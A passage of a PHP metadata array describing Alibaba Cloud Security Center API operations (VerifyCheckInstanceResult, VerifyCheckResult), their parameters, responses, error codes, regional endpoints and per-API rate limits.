\\"LinkErrorConfigs\\": [\\n {\\n \\"Name\\": \\"IpLists\\",\\n \\"ShowName\\": \\"IP Lists\\",\\n \\"Type\\": \\"repair\\"\\n }\\n ]\\n }\\n ],\\n \\"ErrorRepairConfigs\\": [\\n {\\n \\"Name\\": \\"IpLists\\",\\n \\"Value\\": \\"172.26.49.XX\\\\n\\",\\n \\"Type\\": \\"repair\\",\\n \\"ErrorCode\\": \\"ConfigEqualIllegal\\",\\n \\"ErrorMsg\\": \\"Repair parameter is not equal to corresponding check parameter\\",\\n \\"LinkErrorConfigs\\": [\\n {\\n \\"Name\\": \\"IpList\\",\\n \\"ShowName\\": \\"Ip List\\",\\n \\"Type\\": \\"custom\\"\\n }\\n ]\\n }\\n ],\\n \\"ErrorCheckCustomConfig\\": {\\n \\"ErrorCode\\": \\"CspmVerifyCheckCustomItemNoPass\\",\\n \\"ErrorMsg\\": \\"Creation verification failed.\\"\\n }\\n}","type":"json"}]', ], 'VerifyCheckInstanceResult' => [ 'summary' => 'Verifies the instance dimensions under a check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'paid', 'abilityTreeCode' => '119344', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to obtain the ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '16', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of instance IDs of the assets affected by the check item.', 'type' => 'array', 'items' => ['description' => 'The instance ID of the asset affected by the check item.', 'type' => 'string', 'required' => false, 'example' => 'i-2ze3a5ws0mjvqwqr****', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'TaskSource', 'in' => 'query', 'schema' => ['description' => 'The source of the task. Valid values:'."\n" ."\n" .'- **YAO_CHI**: YaoChi console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], ], [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of IDs of the check items.', 'type' => 'array', 'items' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '11', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'OperateCode' => ['description' => 'The operation code of the cloud service configuration check task. Valid values:'."\n" ."\n" .'- **Throttling**: The request frequency is limited.'."\n" .'- **ActionTrialUnauthorized**: Unauthorized error.', 'type' => 'string', 'example' => 'ActionTrialUnauthorized', 'title' => ''], 'FailInstances' => [ 'description' => 'The list of instances that failed the check.', 'type' => 'array', 'items' => ['description' => 'The instance that failed the check.', 'type' => 'string', 'example' => 'i-2ze3a5ws0mjvqwqr****', 'title' => ''], 'title' => '', 'example' => '', ], 'TaskId' => ['description' => 'The task ID.', 'type' => 'string', 'example' => 'a410bb3-e68c217a-3368bc0-238c668***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'B869E3A0-1147-539D-9920-47580700****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ['errorCode' => 'UnbindInstance', 'errorMessage' => 'Instance is not bindScope to any scope config.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Verifies the instance dimensions under a check item', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'VerifyCheckInstanceResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:VerifyCheckInstanceResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"OperateCode\\": \\"ActionTrialUnauthorized\\",\\n \\"FailInstances\\": [\\n \\"i-2ze3a5ws0mjvqwqr****\\"\\n ],\\n \\"TaskId\\": \\"a410bb3-e68c217a-3368bc0-238c668***\\"\\n },\\n \\"RequestId\\": \\"B869E3A0-1147-539D-9920-47580700****\\"\\n}","type":"json"}]', ], 'VerifyCheckResult' => [ 'summary' => 'Performs check item-level validation.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'paid', 'abilityTreeCode' => '119338', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of check item IDs.', 'type' => 'array', 'items' => ['description' => 'The ID of the check item.'."\n" ."\n" .'> You can call the [ListCheckResult](~~ListCheckResult~~) operation to obtain check item IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '25', 'title' => ''], 'required' => false, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], [ 'name' => 'TaskSource', 'in' => 'query', 'schema' => ['description' => 'The task source. Valid values:'."\n" ."\n" .'- **YAO_CHI**: ApsaraDB console.', 'type' => 'string', 'required' => false, 'example' => 'YAO_CHI', 'title' => ''], ], [ 'name' => 'InstanceIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of instance IDs of the assets associated with the check items.', 'type' => 'array', 'items' => ['description' => 'The cloud service instance ID of the check item.', 'type' => 'string', 'required' => false, 'example' => 'i-uf6j8vq9l4r5ntht****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7C0A3FA0-AA32-5660-8989-85A5582F****', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'OperateCode' => ['description' => 'The operation code of the cloud service configuration check task. Valid values:'."\n" ."\n" .'- **Throttling**: Rate limited.'."\n" .'- **ActionTrialUnauthorized**: Unauthorized error.', 'type' => 'string', 'example' => 'Throttling', 'title' => ''], 'ThrottlingTimeSecond' => ['description' => 'The rate limit duration. Unit: seconds.', 'type' => 'integer', 'format' => 'int32', 'example' => '1800', 'title' => ''], 'TaskId' => ['description' => 'The task ID.', 'type' => 'string', 'example' => '8eded533-5348-468c-aa1d-0aa2934a7***', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Check item-level validation', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'VerifyCheckResult'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:VerifyCheckResult', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7C0A3FA0-AA32-5660-8989-85A5582F****\\",\\n \\"Data\\": {\\n \\"OperateCode\\": \\"Throttling\\",\\n \\"ThrottlingTimeSecond\\": 1800,\\n \\"TaskId\\": \\"8eded533-5348-468c-aa1d-0aa2934a7***\\"\\n }\\n}","type":"json"}]', ], ], 'endpoints' => [ ['regionId' => 'cn-nanjing', 'regionName' => 'China (Nanjing - Local Region)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => ''], ['regionId' => 'cn-fuzhou', 'regionName' => 'China (Fuzhou - Local Region)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => ''], ['regionId' => 'cn-beijing', 'regionName' => 'China (Beijing)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-wulanchabu', 'regionName' => 'China (Ulanqab)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-shanghai', 'regionName' => 'China (Shanghai)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-hongkong', 'regionName' => 'China (Hong Kong)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-heyuan', 'regionName' => 'China (Heyuan)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-zhangjiakou', 'regionName' => 'China (Zhangjiakou)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-shenzhen', 'regionName' => 'China (Shenzhen)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'ap-northeast-2', 'regionName' => 'South Korea (Seoul)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'ap-northeast-1', 'regionName' => 'Japan (Tokyo)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-chengdu', 'regionName' => 'China (Chengdu)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-guangzhou', 'regionName' => 'China (Guangzhou)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'ap-southeast-1', 'regionName' => 'Singapore', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'ap-southeast-2', 'regionName' => 'Australia (Sydney) Closed', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-vpc.ap-southeast-2.aliyuncs.com'], ['regionId' => 'ap-southeast-3', 'regionName' => 'Malaysia (Kuala Lumpur)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com ', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com ', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-huhehaote', 'regionName' => 'China (Hohhot)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'ap-southeast-5', 'regionName' => 'Indonesia (Jakarta)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com ', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com ', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'ap-southeast-6', 'regionName' => 'Philippines (Manila)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'ap-southeast-7', 'regionName' => 'Thailand (Bangkok)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-hangzhou', 'regionName' => 'China (Hangzhou)', 'areaId' => 'asiaPacific', 'areaName' => 'Asia Pacific', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'us-east-1', 'regionName' => 'US (Virginia)', 'areaId' => 'europeAmerica', 'areaName' => 'Europe & Americas', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'eu-west-1', 'regionName' => 'UK (London)', 'areaId' => 'europeAmerica', 'areaName' => 'Europe & Americas', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'us-west-1', 'regionName' => 'US (Silicon Valley)', 'areaId' => 'europeAmerica', 'areaName' => 'Europe & Americas', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'eu-central-1', 'regionName' => 'Germany (Frankfurt)', 'areaId' => 'europeAmerica', 'areaName' => 'Europe & Americas', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => 'tds-intl.vpc-proxy.aliyuncs.com'], ['regionId' => 'me-east-1', 'regionName' => 'UAE (Dubai)', 'areaId' => 'middleEast', 'areaName' => 'Middle East', 'public' => 'tds.ap-southeast-1.aliyuncs.com', 'endpoint' => 'tds.ap-southeast-1.aliyuncs.com', 'vpc' => ''], ['regionId' => 'cn-heyuan-acdr-1', 'regionName' => 'Heyuan ACDR Auto', 'areaId' => 'industryCloud', 'areaName' => 'Industry Cloud', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => 'tds.vpc-proxy.aliyuncs.com'], ['regionId' => 'cn-beijing-finance-1', 'regionName' => 'China North 2 Finance (Preview)', 'areaId' => 'industryCloud', 'areaName' => 'Industry Cloud', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => ''], ['regionId' => 'cn-hangzhou-finance', 'regionName' => 'China East 1 Finance', 'areaId' => 'industryCloud', 'areaName' => 'Industry Cloud', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => ''], ['regionId' => 'cn-shanghai-finance-1', 'regionName' => 'China East 2 Finance', 'areaId' => 'industryCloud', 'areaName' => 'Industry Cloud', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => ''], ['regionId' => 'cn-shenzhen-finance-1', 'regionName' => 'China South 1 Finance', 'areaId' => 'industryCloud', 'areaName' => 'Industry Cloud', 'public' => 'tds.cn-shanghai.aliyuncs.com', 'endpoint' => 'tds.cn-shanghai.aliyuncs.com', 'vpc' => ''], ], 'errorCodes' => [ ['code' => 'EdrSaleAdmissionDenied', 'message' => 'EDR Sale Admission Denied.', 'http_code' => 400, 'description' => 'No Agentic-EDR purchased'], ], 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeOnceTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClientUserDefineRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddTagWithUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileProtectEvent'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteBackupPolicyMachine'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteIdcProbe'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCloudAssetInstances'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddVpcHoneyPot'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateInterceptionTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyUsageTop'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetFileDetectReport'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSupervisonInfo'], ['threshold' => '10000', 'countWindow' => 1, 'regionId' => '*'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleSimilarMaliciousFiles'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckRuleInstance'], ['threshold' => '15', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetInstanceAlarmStatistics'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyClientConfSetup'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyVulTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'QueryIncidentIconList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateVirusEvents'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedInstanceDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageRepoCriteria'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSummaryInfo'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateVirusScanOnceTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeDataSource'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyLinkedClientList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetPropertyScheduleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteMonitorAccount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'InstallAegisForLingjun'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateSelectionKeyByType'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DisableCustomBlockRecord'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateFileProtectRule'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteOpaStrategyNew'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecurityCheckScheduleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetVirusScanConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SetSensitiveDefineRuleConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeModuleConfig'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'BindHybridProxy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCheckItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteDingTalk'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteLoginBaseConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateImageVulWhitelistTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterRuleSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateJenkinsImageScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePluginSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetSasContainerWebDefenseRuleCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListDockerhubImage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockCreateConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeInstanceAntiBruteForceRules'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrictEventName'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTaskResult'], ['threshold' => '60', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupMachineStatus'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSystemAggregationRules'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeConcernNecessity'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineStrategy'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAffectedMaliciousFileImages'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteCheckPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeIdcProbeScanResultList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetClusterScannerYaml'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteInterceptionTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeStrategyTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCheckPolicy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListSasContainerWebDefenseRule'], ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetDetailByUuid'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'StartBaselineSecurityCheck'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteAttestor'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulExportInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeEventLevelCount'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockExclusiveFileType'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageLatestScanTask'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetOpaClusterLabelList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScaDetail'], ['threshold' => '30', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeVulDetails'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DeleteImageEventOperation'], ['threshold' => '2', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExecStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListClusterInterceptionConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyBackupPolicyStatus'], ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SendCustomizeReport'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateK8sAccessInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyProcItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageEventOperationCondition'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAgentlessRegion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCriteria'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAssetSelectionTarget'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImage'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'SaveImageBaselineStrategy'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateVulAutoRepairConfig'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAssetsSecurityEventSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageBaselineDetail'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeHybridProxyClusterList'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSoarStrategyTaskDetail'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWarningMachines'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeWebLockFileTypeSummary'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyContainerDefenseRuleSwitch'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'EnableServiceAccessResourceDirectory'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeFrontVulPatchList'], ['threshold' => '50', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeGroupedVul'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItem'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'AddImageVulWhiteList'], ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'RefreshOssBucketScanInfo'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'TriggerCheck'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeSecureSuggestion'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeExposedCheckWarning'], ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'HandleSecurityEvents'], ['threshold' => '20', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetCheckSummary'], ['threshold' => '10', 